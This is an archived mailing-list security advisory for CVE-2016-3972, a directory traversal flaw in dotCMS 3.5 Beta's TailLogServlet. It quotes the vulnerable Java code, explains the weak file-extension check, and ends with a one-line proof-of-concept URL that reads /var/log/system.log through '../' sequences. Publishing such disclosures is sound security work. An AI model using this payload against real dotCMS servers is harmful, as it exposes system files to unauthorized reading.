Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 8 Apr 2016 11:07:35 +0800
From: xiong piaox <yahoo860201@...il.com>
To: fulldisclosure@...lists.org
Cc: bugs@...uritytracker.com, bugtraq@...urityfocus.com, 
	oss-security@...ts.openwall.com
Subject: [CVE-2016-3972]DotCMS Directory traversal vulnerability

Advisory: DotCMS Directory traversal vulnerability

Author: Piaox From Pingan Product Safety Group

Email: xiongyaofu351@...gan.com.cn

Affected Version: dotCMS 3.5 Beta(the latest version)



==========================

Vulnerability Description

Recetly, I found a Directory traversal vulnerability in ‘DotCMS'
program,  DotCMS is widely used in many companies.



Vulnerable file is: “com.dotmarketing.servlets.taillog.TailLogServlet.class”

File file = *null*;

    String tailLogLofFolder = *Config*.*getStringProperty*(
"TAIL_LOG_LOG_FOLDER", "./dotsecure/logs/");

    *try*

    {

      *if* (!tailLogLofFolder.endsWith(File.separator)) {

        tailLogLofFolder = tailLogLofFolder + File.separator;

      }

      file = *new* File(*FileUtil*.*getAbsolutlePath*(tailLogLofFolder +
fileName));

    }

    *catch* (Exception e)

    {

      *Logger*.*error*(getClass(), "unable to open log file '" +
tailLogLofFolder + fileName + "' please set the config variable
TAIL_LOG_LOG_FOLDER correctly");

    }

    *if* ((file == *null*) || (!file.exists()))

    {

      response.sendError(403);

      *AdminLogger*.*log*(*TailLogServlet*.*class*, "service", "Someone
tried to use the TailLogServlet to display a file not in the logs directory"
);

      *return*;

    }

    String regex = *Config*.*getStringProperty*("TAIL_LOG_FILE_REGEX");

//WEB-INF/classes/dotmarketing-config.properties:TAIL_LOG_FILE_REGEX=.*\.log$|.*\.out$

    *if* (!*UtilMethods*.*isSet*(regex)) {

      regex = "!.*";

    }

*if* (!Pattern.compile(regex).matcher(fileName).matches()) {

//Only detects whether the file extension .log end,lead ,caused Directory
traversal vulnerability.

      *return*;

    }

    response.setContentType("text/html;charset=UTF-8");



    ServletOutputStream out = response.getOutputStream();



    out.print("<html><head><title>dotCMS Log</title><style
type='text/css'>@...ort '/html/css/dot_admin.css';</style><script>var
working =false;function
doS(){if(!working){working=true;if(parent.document.getElementById('scrollMe').checked){dh=document.body.scrollHeight;ch=document.body.clientHeight;if(dh>ch){moveme=dh-ch;window.scrollTo(0,moveme);}}working=false;}}</script></head><body
class='tailerBody'>");



    out.flush();



    *Tailer* tailer = *null*;

    *long* startPosition = file.length() - 5000L < 0L ? 0L : file.length()
- 5000L;



    *MyTailerListener* listener = *new* MyTailerListener(*null*);

    listener.*handle*("Tailing " + fileName);

    listener.*handle*("----------------------------- ");

    tailer = *new* *Tailer*(file, listener, 1000L);

    tailer.*setStartPosition*(startPosition);

    *MyTailerThread* thread = *new* *MyTailerThread*(tailer);



    String name = *null*;

    *for* (*int* i = 0; i < 1000; i++)

    {

      name = "LogTailer" + i + ":" + fileName;

      Thread t = *ThreadUtils*.*getThread*(name);

      *if* (t == *null*) {

        *break*;

      }

      *if* (i > 100) {

        *throw* *new* ServletException("Too many Logger threads");

      }

    }



==========================

POC && EXP

==========================

1. Login

2.
http://localhost:8080/dotTailLogServlet/?fileName=../../../../../../../../var/log/system.log

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ